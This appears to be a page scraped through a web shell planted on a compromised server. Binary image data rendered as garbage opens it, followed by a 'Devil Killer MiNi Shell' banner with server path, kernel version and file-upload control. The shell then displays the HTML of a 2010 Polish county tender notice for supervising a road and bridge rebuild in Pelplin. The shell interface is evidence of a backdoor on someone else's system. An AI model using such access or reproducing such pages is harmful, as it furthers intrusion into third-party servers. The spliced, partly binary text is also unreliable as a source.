JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/178614-N-2010.html

<p class="kh_header"><b>Tczew: PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADANIA INWESTYCYJNEGO PN: PRZEBUDOWA DROGI POWIATOWEJ - ULICY KOŚCIUSZKI (2886G) W PELPLINIE - ETAP I - zadanie obejmuje przebudowę drogi od km 0+000,00 do km 0+249,80 wraz z przebudową obiektu mostowego na rzece Wierzyca.</b><br>
<b>Numer ogłoszenia: 178614 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tczewski , ul. Piaskowa 2, 83-110 Tczew, woj. pomorskie, tel. 58 7734 800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADANIA INWESTYCYJNEGO PN: PRZEBUDOWA DROGI POWIATOWEJ - ULICY KOŚCIUSZKI (2886G) W PELPLINIE - ETAP I - zadanie obejmuje przebudowę drogi od km 0+000,00 do km 0+249,80 wraz z przebudową obiektu mostowego na rzece Wierzyca..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania inwestycyjnego pn.: Przebudowa drogi powiatowej - ulicy Kościuszki (2886G) w Pelplinie - Etap I obejmującego przebudowę drogi powiatowej - ulicy Kościuszki w Pelplinie od km 0+000,00 do km 0+249,80 biegnącej w ciągu drogi powiatowej nr 2886G Pelplin - Nowa Cerkiew wraz z przebudową obiektu mostowego na rzece Wierzyca.
2.2 	Nadzór inwestorski nad robotami budowlanymi w branżach: drogowej, mostowej, sanitarnej, elektrycznej/elektroenergetycznej i teletechnicznej będzie dotyczył przebudowy drogi wraz z przebudową mostu drogowego nad rzeką Wierzyca.
Przebudowa drogi polegać będzie na poprawie geometrii, wykonaniu nowej konstrukcji i nawierzchni ulicy, wykonaniu odwodnienia i oświetlenia, przebudowie zjazdów do posesji i budowie chodników oraz przebudowie istniejącego uzbrojenia kolidującego    z nowym układem geometrycznym ulicy.
Przebudowa mostu drogowego nad rzeką polegać będzie na całkowitej wymianie konstrukcji przęsła, połączonej z modernizacją przyczółków i filarów.
2.3 	Zakres planowanych robót drogowych obejmuje:
- wykonanie nowej nawierzchni  drogi,
- przebudowę chodników,
- przebudowę zjazdów do posesji,
- budowę nowego oświetlenia,,
- budowę kanalizacji deszczowej,
- przebudowę sieci wodociągowej,
- budowę kanalizacji sanitarnej,
- usunięcie kolizji z istniejącym uzbrojeniem.
Łączna długość przebudowywanej jezdni ul. Kościuszki w I Etapie wynosi 249,80 mb (w tym nawierzchnia jezdni na moście).
2.4 	Zakres planowanych robót mostowych obejmuje:
- rozbiórkę krawężników kamiennych, nawierzchni oraz izolacji poziomej na obiekcie oraz w obrębie przyczółków,
- demontaż stalowej balustrady oraz podwieszenie istniejących instalacji,
- rozbiórkę żelbetowej konstrukcji przęseł,
- rozbiórkę betonowych części filarów, skrzydeł oraz korpusów przyczółków,
- rozbiórkę płyt przejściowych,
- nadbudowę filarów, korpusów przyczółków wraz ze skrzydłami,
- wykonanie płyt przejściowych,
- zasypanie korpusów przyczółków, profilowanie skarp oraz stożków nasypów,
- wykonanie schodów skarpowych, umocnienie skarp prefabrykatami betonowymi,
- montaż łożysk,
- montaż stalowych konstrukcji przęseł,
- wykonanie żelbetowej płyty pomostu,
- wykonanie izolacji poziomej płyty pomostu oraz płyt przejściowych,
- montaż elementów odwodnienia - sączków oraz wpustów,
- montaż dylatacji, barier energochłonnych oraz balustrad.
Wykonawca robót budowlanych na czas budowy przejmie obowiązki użytkownika mostu w zakresie ochrony środowiska określone w pozwoleniu wodnoprawnym            - decyzja Nr WR.6224/21/09 w szczególności pkt.2 niniejszej decyzji.
2.5 	Planowane parametry techniczne ulicy  po przebudowie:
klasa techniczna                                    -  Z
prędkość projektowa                               -  30, 40 km/h (uspokojenie ruchu)szerokość jezdni                                     -  6,00m  (2x3,00m), 7,00 (2x3,50m)
szerokość korony                                    - zmienna (min.11,0m)
szerokość chodnika                                 -  2,00-5,50 m
kategoria ruchu                                      -  KR 3
obciążenie                                             -  115 kN/oś
2.6 	Planowane parametry techniczne mostu po przebudowie:
obciążenie użytkowe                               -  klasa techniczna A
długość całkowita obiektu                        -  38,38 m
rozpiętość przęseł                                   -  7,15+14,30+7,15 m
szerokość całkowita obiektu                     -  13,30 m
szerokość jezdni                                     -  7,00 m
szerokość użytkowa chodników                 -  2x2,00 m
kąt ukosu obiektu z rzeką                         -  73o 
2.7 Szczegółowy zakres robót zawarty jest w dokumentacji projektowej autorstwa PRACOWNI PROJEKTOWEJ sp. z o.o. EURO ALIANS 80-288 Gdańsk,                   ul. Marusarzówny 2 paw.22 załączonej na stronie internetowej Zamawiającego do postępowania na roboty budowlane p.n.:Przebudowa drogi powiatowej - ulicy Kościuszki (2886G) w Pelplinie - Etap I
2.8	W ramach niniejszego zamówienia Wykonawca - Inspektor Nadzoru  zobowiązuje się do:
2.8.1	Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności       z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, pozwoleniem na budowę, przepisami prawa, w tym m.in. przepisami techniczno-wykonawczymi, w zakresie BHP i normami oraz zasadami wiedzy technicznej;
2.8.2	Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych,  a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych     i nie dopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu;
2.8.3	Zatwierdzania  materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, w tym również z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich asortymentów robót;
2.8.4	 Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) materiałów, prefabrykatów - w tym mieszanek mineralno-bitumicznych, betonów, sprzętu           i urządzeń  przewidzianych  do  realizacji  robót  w oparciu o przepisy prawa, normy i wymagania sformułowane w umowie z wykonawcą robót, w dokumentacji projektowej, w tym w projektach budowlanych, projektach budowlanych wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót;
2.8.5	Sprawdzania i odbioru  robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych sieci i urządzeń technicznych;
2.8.6	Potwierdzania faktycznie wykonanych robót oraz usunięcia wad;
2.8.7	 Przygotowania do odbioru częściowego inwestycji i odbioru częściowego inwestycji;
2.8.8	Przygotowania do odbioru końcowego i odbioru końcowego inwestycji. Sprawdzenia i zatwierdzenia dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej;
2.8.9	 Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;
2.8.10	 Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;
2.8.11	 Bieżącej kontroli ilości i terminowości wykonywanych robót. Kontroli zgodności wykonywanych robót z harmonogramem rzeczowo-finansowym robót. Podejmowania działań w celu dotrzymania terminu realizacji inwestycji;
2.8.12	Nadzorowania budowy w takich odstępach czasu, aby była zapewniona skuteczność nadzoru, jednak nie rzadziej niż min. 3 razy w tygodniu oraz na każde żądanie Zamawiającego, w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna najpóźniej w następnym dniu od powiadomienia pisemnego lub ustnego. Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy;
2.8.13	 Kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie  w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;
2.8.14	 Sporządzenia pełnego rozliczenia finansowego nadzorowanej inwestycji;
2.8.15	 Sprawdzenia i akceptacji faktur wykonawcy robót oraz dokumentów załączonych do rozliczenia robót budowlanych;
2.8.16	 Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych  usterek/wad w dokumentacji projektowej;
2.8.17	Sporządzenia sprawozdań miesięcznych z postępu nadzorowanych przez siebie robót, które Koordynator Zespołu przekaże Zamawiającemu w terminie do 5 dnia miesiąca następującego po miesiącu w którym wykonane będą nadzorowane roboty. 
W sprawozdaniu należy przedstawić: 
- Szczegółowy wykaz robót wykonanych w okresie sprawozdawczym oraz narastająco od początku budowy (również z podaniem ich wartości kwotowej     i procentowej),
- Analizę zgodności postępu robót z harmonogramem rzeczowo-finansowym; 
2.8.18	Informowania na bieżąco Zamawiającego (niezależnie od składania sprawozdań)  o przebiegu prac, o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie zwłaszcza  w sprawach mogących wpłynąć na termin zakończenia robót);
2.8.19	 Przygotowania do odbiorów (przeglądów) w okresie rękojmi inwestycji oraz odbiór (przegląd) w okresie rękojmi inwestycji.
Zakres podstawowych obowiązków i praw inspektora nadzoru inwestorskiego określa  art. 25 i art.26 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r.  Nr 156, poz.1118 z późn. zm.).
2.10. Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających,  o których mowa w art. 67 ust. 1 pkt 6 Ustawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1	Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę 1 500,00 PLN (słownie: tysiąc pięćset złotych).
8.2	Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w punkcie 11.1 SIWZ.
8.3	Wadium może być wnoszone w następujących formach: 
8.3.1 pieniądzu, 
8.3.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.3.3 gwarancjach bankowych, 
8.3.4 gwarancjach ubezpieczeniowych,
8.3.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
8.4	Jeżeli wadium zostanie wniesione w pieniądzu, należy je wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Millenium SA 09 1160 2202 0000 0000 6901 1777. Wykonawca powinien dołączyć do oferty kserokopię wniesienia wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - przetarg na Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania inwestycyjnego pn.: Przebudowa drogi powiatowej - ulicy Kościuszki (2886G) w Pelplinie - Etap I. W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty potwierdzające wniesienie wadium, o których mowa w punkcie 8.3 muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
8.5	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 8.4 SIWZ.
8.6	Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:4.3.1 Wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  co najmniej:  jednego zamówienia* na wykonanie usługi nadzoru inwestorskiego nad zadaniem inwestycyjnym obejmującym roboty budowlane mostowe** i drogowe w branżach: mostowej, drogowej, sanitarnej, elektrycznej/elektroenergetycznej i teletechnicznej   o wartości brutto nadzorowanych robót budowlanych  nie mniejszej  niż  3 000 000,00 zł brutto, (słownie: trzy miliony złotych brutto). 
* zamówienie nie musi być zamówieniem publicznym. 
** roboty mostowe w rozumieniu robót budowlanych na obiekcie mostowym, np. moście, wiadukcie, estakadzie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:4.3.2 Dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zadania, a także zakresu wykonywania przez nich czynności tj.:
a) 1 osoby na stanowisko inspektora nadzoru inwestorskiego w branży mostowej posiadającej: 
- stosowne uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót  w specjalności/branży mostowej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży mostowej na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot przy realizacji robót budowlanych mostowych;
b) 1 osoby na stanowisko inspektora nadzoru inwestorskiego w branży drogowej posiadającej:
- uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności/branży drogowej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 3 lata doświadczenia zawodowego w branży drogowej na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robót przy realizacji robót budowlanych drogowych i/lub mostowych;
c) 1 osoby na stanowisko inspektora nadzoru inwestorskiego w branży sanitarnej posiadającej:
- uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności/branży sanitarnej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 1 rok doświadczenia zawodowego w branży sanitarnej na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot przy realizacji robót budowlanych drogowych i/ lub mostowych;
d) 1 osoby na stanowisko inspektora nadzoru inwestorskiego w branży elektryczne/elektroenergetycznej posiadającej:
- uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności/branży elektrycznej/elektroenergetycznej w zakresie niezbędnym  do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 1 rok doświadczenia zawodowego w branży elektrycznej/elektroenergetycznej na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot przy realizacji robót budowlanych drogowych i/lub mostowych;
e) 1 osoby na stanowisko inspektora nadzoru inwestorskiego w branży teletechnicznej posiadającej:
- uprawnienia/dokumenty które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzorowanie robót w specjalności/branży teletechnicznej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 1 rok  doświadczenia zawodowego w branży teletechnicznej na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot przy realizacji robót budowlanych drogowych i/lub mostowych;
Przez wymagane doświadczenie zawodowe na danym stanowisku należy rozumieć lata czynnie przepracowane na danym stanowisku przy realizacji ww. robót budowlanych.
Niniejsze oznacza, iż:
- osoba na stanowisko inspektora nadzoru inwestorskiego w branży mostowej musi posiadać doświadczenie w tej branży na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot branży mostowej przy realizacji robót budowlanych mostowych w ramach zamówienia/zamówień w łącznym okresie co najmniej 3 lat*,
- osoba na stanowisko inspektora nadzoru inwestorskiego w branży drogowej musi posiadać doświadczenie w tej branży na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot branży drogowej przy realizacji robót budowlanych drogowych i/lub mostowych w ramach zamówienia/zamówień w łącznym okresie co najmniej 3 lat*,
- osoba na stanowisko inspektora nadzoru inwestorskiego w branży sanitarnej musi posiadać doświadczenie w tej branży na stanowisku inspektora nadzoru inwestorskiego lub kierownika budowy lub kierownika robot branży sanitarnej przy realizacji robót budowlanych drogowych i/lub mostowych w ramach zamówienia/zamówień w łącznym okresie co najmniej 1roku*.
Wymagania dot. doświadczenia pozostałych osób, (tj. na stanowisko inspektora nadzoru w branży elektryczne/elektroenergetycznej oraz na stanowisko inspektora nadzoru w branży teletechnicznej należy rozumieć analogicznie, jak dla osoby na stanowisko inspektora nadzoru w branży sanitarnej.
* Nie podlegają sumowaniu okresy prac wykonywanych w tym samym czasie w ramach różnych zamówień, co oznacza że jeżeli np. osoba na stanowisko inspektora nadzoru w branży sanitarnej pełniła w okresie od 1 stycznia 2009r. do 31 grudnia 2009r. jednocześnie dwie funkcje tj. 
- inspektora nadzoru w branży sanitarnej nad robotami budowlanymi objętymi zamówieniem X oraz 
- inspektora nadzoru w branży sanitarnej nad robotami budowlanymi objętymi zamówieniem Y
Zamawiający do wymaganego stażu zawodowego zaliczy jeden rok doświadczenia zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:4.3.3 Posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 100.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

